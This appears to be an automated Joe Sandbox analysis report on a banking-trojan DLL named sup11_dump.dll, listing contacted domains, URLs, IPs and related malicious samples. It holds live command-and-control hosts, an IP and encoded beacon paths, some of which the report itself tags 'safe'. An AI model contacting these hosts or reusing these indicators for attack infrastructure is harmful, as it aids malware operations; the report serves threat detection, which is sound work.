http://constitution.org/usdeclar.txt	0%	Avira URL Cloud	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
http://api3.lepini.at/api1/U2cJFG4d72Sw1/coZoTMXb/lP1gviHXrIHWsvunsGl6cnc/P0V_2BL3fj/46b0n6i8fucqBFlqF/hcagnGa1TbpS/dgul3xzYijV/L8f_2B7T21euzh/9_2ByVhlbD4q5WftmVdrM/zBjLhgYQ1PYM0cHh/x5hh2ZDx_2FdFJL/wYla_2Frk0rvM65swQ/cH6PtCte0/lwimgIOiQ_2Fctv6niAP/fIjCPduuWdUdoTOKkQg/18uc85TvLrI_2BdUpjqsJC/iPMSa8oRiSqUF/LVEeH34R/iuq5fk_2BzVlr4Uczzgpoea/kUr98o_2Bs/jBUez8HK/7Gj8QOr	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	92.122.253.103	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	92.122.253.103	true	false		high
c56.lepini.at	45.138.24.6	true	true	8%, Virustotal, Browse	unknown
lg3.media.net	92.122.253.103	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	45.138.24.6	true	false	11%, Virustotal, Browse	unknown
api10.laptok.at	45.138.24.6	true	false	11%, Virustotal, Browse	unknown
web.vortex.data.msn.com	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	true		unknown
cvision.media.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/favicon.ico	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/U2cJFG4d72Sw1/coZoTMXb/lP1gviHXrIHWsvunsGl6cnc/P0V_2BL3fj/46b0n6i8fucqBFlqF/hcagnGa1TbpS/dgul3xzYijV/L8f_2B7T21euzh/9_2ByVhlbD4q5WftmVdrM/zBjLhgYQ1PYM0cHh/x5hh2ZDx_2FdFJL/wYla_2Frk0rvM65swQ/cH6PtCte0/lwimgIOiQ_2Fctv6niAP/fIjCPduuWdUdoTOKkQg/18uc85TvLrI_2BdUpjqsJC/iPMSa8oRiSqUF/LVEeH34R/iuq5fk_2BzVlr4Uczzgpoea/kUr98o_2Bs/jBUez8HK/7Gj8QOr	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://searchads.msn.net/.cfm?&&kp=1&	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.4.dr	false		high
https://www.remixd.com/privacy_policy.html	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;Fotos	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
http://constitution.org/usdeclar.txtC:	regsvr32.exe, 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	regsvr32.exe, 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt	de-ch[1].htm.4.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false		high
https://web.vortex.data.msn.com/collect/v1	de-ch[1].htm.4.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000001D.00000002.446586798.0000023380001000.00000004.00000001.sdmp	false		high
http://www.reddit.com/	msapplication.xml4.3.dr	false		high
https://www.skype.com/	de-ch[1].htm.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.4.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.4.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://client-s.gateway.messenger.live.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.brightcom.com/privacy-policy/	iab2Data[1].json.4.dr	false		high
https://contoso.com/Icon	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.4.dr	false		high
https://bealion.com/politica-de-cookies	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api10.laptok.at/api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yE	{1136F6F8-6052-11EB-90E6-ECF4BB82F7E0}.dat.3.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch	de-ch[1].htm.4.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.4.dr	false		high
https://twitter.com/i/notifications;Ich	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.4.dr	false		high
https://www.gadsme.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	false		high
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.4.dr	false		high
http://constitution.org/usdeclar.txt	regsvr32.exe, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.4.dr	false		high
http://www.youtube.com/	msapplication.xml7.3.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.4.dr	false		high
https://docs.prebid.org/privacy.html	iab2Data[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.4.dr	false		high
https://www.skype.com/de/download-skype	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.4.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://channelpilot.co.uk/privacy-policy	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.4.dr	false		high
https://contoso.com/License	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
http://www.amazon.com/	msapplication.xml.3.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://www.twitter.com/	msapplication.xml5.3.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.admo.tv/en/privacy-policy	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath	iab2Data[1].json.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://outlook.com/	de-ch[1].htm.4.dr	false		high
https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.4.dr	false		high
https://contoso.com/	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch&ued=https%	de-ch[1].htm.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	~DFE1BCDF1B7A4F52FD.TMP.3.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.4.dr	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	false		high
http://www.nytimes.com/	msapplication.xml3.3.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.4.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://popup.taboola.com/german	auction[1].htm.4.dr	false		high
https://listonic.com/privacy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.4.dr	false		high
https://twitter.com/	de-ch[1].htm.4.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de	de-ch[1].htm.4.dr	false		high
https://quantyoo.de/datenschutz	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.live.com/calendar	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/#qt=mru	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap	auction[1].htm.4.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.138.24.6	unknown	Turkey		62068	SPECTRAIPSpectraIPBVNL	true
151.101.1.44	unknown	United States		54113	FASTLYUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344607
Start date:	26.01.2021
Start time:	19:43:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	sup11_dump.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winDLL@31/158@17/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.6% (good quality ratio 5.3%) Quality average: 79% Quality standard deviation: 28%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Created / dropped Files have been reduced to 100 Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.108.39.131, 204.79.197.203, 204.79.197.200, 13.107.21.200, 95.101.22.61, 95.101.22.71, 65.55.44.109, 92.122.253.103, 131.253.33.203, 23.210.248.85, 51.11.168.160, 152.199.19.161, 95.101.22.224, 95.101.22.216, 205.185.216.10, 205.185.216.42, 72.247.178.83, 72.247.178.64, 72.247.178.59, 72.247.178.106, 72.247.178.98, 72.247.178.73, 72.247.178.51, 51.103.5.186, 52.155.217.156, 20.54.26.129, 51.104.139.180, 52.147.198.201 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, wns.notify.windows.com.akadns.net, e11290.dspg.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, global.vortex.data.trafficmanager.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, cs9.wpc.v0cdn.net, au.download.windowsupdate.com.edgesuite.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:45:32	API Interceptor	42x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.138.24.6	out.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	crypt_3300.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
151.101.1.44	http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacb	Get hash	malicious	Browse	cdn.taboola.com/libtrc/w4llc-network/loader.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
contextual.media.net	xDKOaCQQTQ.dll	Get hash	malicious	Browse	2.18.68.31
	4bEUfowOcg.dll	Get hash	malicious	Browse	2.18.68.31
	crypt_l_32.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	92.122.253.103
hblg.media.net	xDKOaCQQTQ.dll	Get hash	malicious	Browse	2.18.68.31
	4bEUfowOcg.dll	Get hash	malicious	Browse	2.18.68.31
	crypt_l_32.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	92.122.253.103
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	92.122.253.103
tls13.taboola.map.fastly.net	xDKOaCQQTQ.dll	Get hash	malicious	Browse	151.101.1.44
	4bEUfowOcg.dll	Get hash	malicious	Browse	151.101.1.44
	crypt_l_32.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.441cc21491bf0823.dll	Get hash	malicious	Browse	151.101.1.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FASTLYUS	xDKOaCQQTQ.dll	Get hash	malicious	Browse	151.101.1.44
	4bEUfowOcg.dll	Get hash	malicious	Browse	151.101.1.44
	QT21006189.exe	Get hash	malicious	Browse	151.101.0.133
	crypt_l_32.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	151.101.1.44
